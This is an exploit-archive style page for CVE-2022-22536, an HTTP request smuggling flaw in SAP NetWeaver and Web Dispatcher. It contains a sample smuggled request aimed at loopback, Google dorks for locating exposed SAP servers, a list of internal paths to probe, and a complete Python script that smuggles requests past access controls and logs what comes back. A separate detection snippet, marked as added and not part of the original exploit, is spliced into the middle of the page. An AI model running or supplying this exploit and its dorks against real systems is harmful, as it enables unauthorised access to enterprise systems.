
SAP NetWeaver 7.53 - HTTP Request Smuggling

# Exploit Title: SapgateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling in SAP's Front Door
# Google Dork: https://github.com/becodoexploit-mrcat/sapgatebreaker-exploit/blob/main/main/dorks
# Date: Tuesday, April 2, 2025
# Exploit Author: @c41tx90 - Victor de Queiroz - Beco do Exploit - Elytron Security
# Vendor Homepage: https://community.sap.com/t5/techno...diation/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation/
# Software Link: https://help.sap.com/docs/support_content/uiwits/3361892375.html
# Version: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher
# Tested on: Red Hat Enterprise Linux (RHEL)
# CVE: CVE-2022-22536
-------
SapgateBreaker - CVE-2022-22536 HTTP Request Smuggler
Author: @c41tx90 - Victor de Queiroz | elytronsecurity.com | becodoexploit.com
---------------------------------------------------------------------------------------------------------------------------
Target: SAP NetWeaver Application Server
Vulnerability: CVE-2022-22536
Exploit type: HTTP Request Smuggling (Content-Length based)
Impact: ACL bypass, internal access
More info and instructions:
---------------------------------------------------------------------------------------------------------------------------
Sample payload:
---------------------------------------------------------------------------------------------------------------------------
GET /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.32.22.7:50000/sap/admin/public/public/default.html
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Cookie: saplb_*=(J2EE7364720)7364750
Authorization: Basic YTPH
Content-Length: 89

0\r
\r
GET /heapDump/ HTTP/1.1\r
Host: 127.0.0.1\r
X-Forwarded-For: 127.0.0.1\r
\r
---------------------------------------------------------------------------------------------------------------------------
Expected response:
---------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
Last-Modified: Tue, 01 Sep 2020 11:54:39 GMT
SAP-Cache-Control: +3600
Date: Tue, 01 Apr 2025 20:33:02 GMT
Content-Length: 4465
Content-Type: text/html
Connection: keep-alive
X-DUMMY: 0
---------------------------------------------------------------------------------------------------------------------------
Success indicators:
  • Internal endpoint answers with status code 200
  • Difference between direct access (403/404) and smuggled access (200)
  • Access to other restricted SAP services via loopback injection
---------------------------------------------------------------------------------------------------------------------------
Example paths to test:
  • /sap/public/bc/icf/info
  • /sap/bc/webdynpro/sap/appl_soap_management
  • /heapdump/
  • /ctc/configservlet
  • /sap/public/bc/icf/logon.html
  • /webdynpro/resources/sap.com/tc~lm~config~content/
---------------------------------------------------------------------------------------------------------------------------
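A defender-side check for the request shape shown above, added here as an example and not part of the original exploit: it parses a raw front-door request, honours the declared Content-Length, and reports whether the body hides a second request line whose Host points at loopback, which is what a reverse proxy, WAF or log review should flag. The sample request is constructed from the page's payload; the function and variable names are mine.

```python
import re
from typing import Optional

# Constructed sample: the body from this page's payload (chunk terminator, then a
# second GET aimed at loopback) wrapped in a Content-Length framed POST.
SMUGGLED_BODY = (b"0\r\n\r\nGET /heapDump/ HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                 b"X-Forwarded-For: 127.0.0.1\r\n\r\n")
SAMPLE_REQUEST = (b"POST /sap/admin/public/default.html HTTP/1.1\r\n"
                  b"Host: 172.32.22.7:50000\r\nContent-Type: application/json\r\n"
                  b"Content-Length: " + str(len(SMUGGLED_BODY)).encode() + b"\r\n\r\n"
                  + SMUGGLED_BODY)

REQUEST_LINE = re.compile(rb"^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/1\.[01]\r?$")
LOOPBACK = re.compile(rb"^(127\.\d+\.\d+\.\d+|localhost|\[?::1\]?)(:\d+)?$", re.I)


def split_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_smuggled_request(raw: bytes) -> Optional[dict]:
    """Return details of an HTTP request embedded in the body, or None if there is none.

    Flags the CVE-2022-22536 pattern: a Content-Length framed body that opens with a
    chunked-encoding terminator ("0\\r\\n\\r\\n") and then carries a full request line
    whose Host is loopback, so a back end that re-parses the body would treat it as a
    second, internally trusted request."""
    request_line, headers, body = split_request(raw)
    if b"content-length" not in headers:
        return None
    body = body[: int(headers[b"content-length"])]  # only the framed body is in scope
    finding = {"outer": request_line.decode(errors="replace"),
               "chunk_terminator": body.startswith(b"0\r\n\r\n")}
    for line in body.split(b"\n"):
        m = REQUEST_LINE.match(line)
        if m:
            finding["inner_method"] = m.group(1).decode()
            finding["inner_path"] = m.group(2).decode()
        elif line.lower().startswith(b"host:"):
            host = line.split(b":", 1)[1].strip()
            finding["inner_host"] = host.decode(errors="replace")
            finding["loopback_host"] = bool(LOOPBACK.match(host))
    return finding if "inner_method" in finding else None
```

A hit with both chunk_terminator and loopback_host set is the exact shape of the sample payload; a body that merely contains a request line (for example, an HTTP request quoted inside a JSON field) still returns a finding, so treat the two flags as the severity signal.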
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of the confidentiality, integrity and availability of the system.
Google Dorks:
intitle:'SAP NetWeaver Application Server Java' inurl:/webdynpro/resources/
intitle:'SAP NetWeaver' 'SAP J2EE Engine'
intitle:'Welcome to SAP NetWeaver' inurl:/irj/portal
intitle:'SAP NetWeaver Administrator' inurl:/nwa
inurl:'/sap/bc/webdynpro' -site:sap.com
inurl:'/sap/public' 'sap netweaver'
inurl:'/sap/admin/public/default.html'
inurl:'/webdynpro/welcome/welcome.html'
inurl:'/sap/public/info.jsp'
"Powered by SAP NetWeaver" inurl:sap
intitle:'SAP Web Dispatcher Administration'
---------------------------------------------------------------------------------------------------------------------------
# Exploit
import argparse
import http.client
from urllib.parse import urlparse
from colorama import Fore, Style, Back, init
import os

init(autoreset=True)

banner = f'''
{Fore.WHITE}
+------------------------------------------+
|  {Style.BRIGHT}{Fore.WHITE}SapgateBreaker{Style.RESET_ALL}                          |
|  by {Fore.YELLOW}@c41tx90{Fore.WHITE}                             |
|  {Style.BRIGHT}{Fore.YELLOW}CVE-2022-22536{Style.RESET_ALL}                          |
|  {Fore.GREEN}t.me/becodoxpl{Fore.WHITE}                          |
|  HTTP Request Smuggler                   |
|  {Fore.YELLOW}becodoexploit.com{Fore.WHITE}                       |
|  {Fore.LIGHTBLUE_EX}elytronsecurity.com{Fore.WHITE}                     |
+------------------------------------------+
'''


def detect_sap_version(host, port, is_https):
    # Fingerprint the front door from the Server header of a plain GET /
    try:
        conn_class = http.client.HTTPSConnection if is_https else http.client.HTTPConnection
        conn = conn_class(host, port, timeout=5)
        conn.request('GET', '/')
        res = conn.getresponse()
        headers = {k.lower(): v for k, v in res.getheaders()}
        server_header = headers.get('server', 'Unknown')
        print(f'{Fore.YELLOW}[*] {Fore.WHITE}Detected SAP server header: {Fore.CYAN}{server_header}\n')
        return server_header
    except Exception as e:
        print(f'{Fore.RED}[!] {Fore.WHITE}Could not determine SAP version: {e}\n')
        return 'Unknown'


def build_smuggled_request(path):
    # Chunk terminator followed by a second request addressed to loopback
    return (f'0\r\n\r\nGET {path} HTTP/1.1\r\nHost: 127.0.0.1\r\n'
            f'X-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n')


def try_file_read(host, port, is_https, verbose):
    test_paths = [
        '/sap/public/bc/icf/info',
        '/sap/public/info.jsp',
        '/sap/public/test/test.jsp',
        '/sap/bc/webdynpro/sap/appl_soap_management',
        '/sap/public/bc/soap/rfc',
        '/webdynpro/welcome/welcome.html',
        '/sr_central',
        '/useradmin/.jsp',
        '/heapdump/',
        '/startpage',
        '/crossdomain.xml',
        '/ctc/configservlet',
        '/webdynpro/resources/sap.com/tc~lm~config~content/',
        '/sld',
        '/sap/bc/webdynpro/sap/wdy_cfg_component_config',
        '/sap/public/bc/icf/logon.html',
        '/sap/bc/webdynpro/sap/itadmin',
        '/sap/public/bc/sec/saml2',
        '/sap/public/bc/webdav'
    ]
    print(f'{Style.BRIGHT}{Fore.RED}[!] {Fore.WHITE}Proof of concept for ACL bypass via HTTP request smuggling{Style.RESET_ALL}\n')
    for path in test_paths:
        # Baseline: how the path answers when requested directly
        try:
            conn_class = http.client.HTTPSConnection if is_https else http.client.HTTPConnection
            conn = conn_class(host, port)
            conn.request('GET', path)
            res_direct = conn.getresponse()
            content_direct = res_direct.read().decode(errors='ignore')
            direct_status = res_direct.status
        except Exception as e:
            print(f'{Fore.RED}[!] {Fore.WHITE}Error checking direct access to {path}: {e}')
            continue
        body = build_smuggled_request(path)
        headers = {
            'Host': f'{host}:{port}',
            'Authorization': 'Basic YTPH',
            'Cookie': 'saplb_*=(J2EE7364720)7364750',
            'Content-Type': 'application/json',
            'Content-Length': str(len(body.encode('utf-8')))
        }
        # Same path, this time carried inside the body of a front-door POST
        try:
            conn = conn_class(host, port)
            conn.request('POST', '/sap/admin/public/default.html', body=body, headers=headers)
            res = conn.getresponse()
            smuggled_headers = res.getheaders()
            content_smuggled = res.read().decode(errors='ignore')
            smuggled_status = res.status
            status_color = Fore.GREEN if smuggled_status != direct_status else Fore.RED
            print(f'{status_color}[-] {Fore.LIGHTBLUE_EX}{path} {Style.BRIGHT}{Fore.WHITE}Direct access: '
                  f'{Fore.YELLOW}({direct_status}) {Fore.WHITE}Smuggled access: '
                  f'{status_color}({smuggled_status}){Style.RESET_ALL}')
            if smuggled_status == direct_status:
                print(f'{Fore.RED}[x] {Fore.WHITE}Exploit did not work for {path}\n')
            with open('poc.txt', 'a') as f:
                f.write(f'\n--- Path: {path} ---\n')
                f.write(f'Direct: {direct_status}\nSmuggled: {smuggled_status}\n')
                f.write('Smuggled request:\nPOST /sap/admin/public/default.html HTTP/1.1\n')
                for k, v in headers.items():
                    f.write(f'{k}: {v}\n')
                f.write(f'\n{body}\n')
                f.write('Smuggled response headers:\n')
                for h in smuggled_headers:
                    f.write(f'{h[0]}: {h[1]}\n')
                if verbose:
                    f.write(f'\nSmuggled response body:\n{content_smuggled}\n')
                    f.write(f'\nDirect response:\n{content_direct}\n')
            if verbose:
                print(f'\n{Fore.BLUE}Payload sent to {path}:{Style.RESET_ALL}')
                print(f'{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1')
                for k, v in headers.items():
                    print(f'{Fore.CYAN}{k}: {v}')
                print(f'\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n')
                print(f'{Fore.BLUE}Response received:{Style.RESET_ALL}')
                print(f'{Back.YELLOW if smuggled_status == 500 else Fore.CYAN}{Fore.WHITE}HTTP/1.1 {smuggled_status}{Style.RESET_ALL}')
                for h in smuggled_headers:
                    print(f'{Fore.CYAN}{h[0]}: {h[1]}')
                print(f'\n{Fore.CYAN}{content_smuggled}{Style.RESET_ALL}')
        except Exception as e:
            print(f'{Fore.RED}[!] {Fore.WHITE}Error smuggling to {path}: {e}')


def send_smuggled_request(target, verbose):
    parsed = urlparse(target)
    is_https = parsed.scheme == 'https'
    port = parsed.port or (443 if is_https else 80)
    host = parsed.hostname
    print(banner)
    print(f'{Fore.YELLOW}[*] {Fore.WHITE}Starting CVE-2022-22536 exploitation against {host}:{port}\n')
    detect_sap_version(host, port, is_https)
    body = build_smuggled_request('/sap/bc/webdynpro/sap/appl_soap_management')
    headers = {
        'Host': f'{host}:{port}',
        'Authorization': 'Basic YTPH',
        'Cookie': 'saplb_*=(J2EE7364720)7364750',
        'Content-Type': 'application/json',
        'Content-Length': str(len(body.encode('utf-8')))
    }
    conn_class = http.client.HTTPSConnection if is_https else http.client.HTTPConnection
    conn = conn_class(host, port)
    try:
        conn.request('POST', '/sap/admin/public/default.html', body=body, headers=headers)
        res = conn.getresponse()
        content = res.read().decode(errors='ignore')
        status_display = f'HTTP/{res.version / 10:.1f} {res.status} {res.reason}'
        is_exploit_success = res.status in [200, 500, 403, 302]
        print(f'{Fore.GREEN if is_exploit_success else Fore.RED}[-] {Fore.WHITE}Exploit executed '
              f'{"successfully" if is_exploit_success else ""}! {Fore.YELLOW}CVE-2022-22536')
        print(f'{Fore.WHITE}{"-" * 60}\n')
        print(f'{Fore.BLUE}Payload sent:{Style.RESET_ALL}')
        print(f'{Fore.CYAN}POST /sap/admin/public/default.html HTTP/1.1')
        for k, v in headers.items():
            print(f'{Fore.CYAN}{k}: {v}')
        print(f'\n{Fore.MAGENTA}{body.strip()}{Style.RESET_ALL}\n')
        print(f'{Fore.BLUE}Response received:{Style.RESET_ALL}')
        print(f'{Back.YELLOW if res.status == 500 else Fore.CYAN}{Fore.WHITE}{status_display}{Style.RESET_ALL}')
        for h in res.getheaders():
            print(f'{Fore.CYAN}{h[0]}: {h[1]}')
        if verbose:
            print(f'\n{Fore.CYAN}{content}{Style.RESET_ALL}')
        with open('poc.txt', 'w') as f:
            f.write('Initial request:\nPOST /sap/admin/public/default.html HTTP/1.1\n')
            for k, v in headers.items():
                f.write(f'{k}: {v}\n')
            f.write(f'\n{body}\n')
            f.write(f'Initial response:\n{status_display}\n')
            for h in res.getheaders():
                f.write(f'{h[0]}: {h[1]}\n')
            f.write(f'\n{content}\n')
        print('\n')
        if is_exploit_success:
            print(f'{Fore.GREEN}[=] {Fore.WHITE}Exploit executed successfully and triggered internal '
                  f'processing behaviour. This indicates a potential HTTP request smuggling condition.')
        else:
            print(f'{Fore.RED}[x] {Fore.WHITE}Exploit did not trigger the expected behaviour. '
                  f'The target may not be vulnerable.')
        print(f'\n{Fore.WHITE}{"-" * 60}\n')
        try_file_read(host, port, is_https, verbose)
    except Exception as e:
        print(f'{Fore.RED}[!] {Fore.WHITE}Error sending initial request: {e}')


def main():
    parser = argparse.ArgumentParser(description='CVE-2022-22536 smuggling PoC')
    parser.add_argument('-u', '--url', required=True, help='Target full URL (e.g. http://host:port)')
    parser.add_argument('--verbose', '-v', action='store_true', help='Show full headers and responses')
    args = parser.parse_args()
    os.system('clear')
    send_smuggled_request(args.url, args.verbose)


if __name__ == '__main__':
    main()
---------------------------------------------------------------------------------------------------------------------------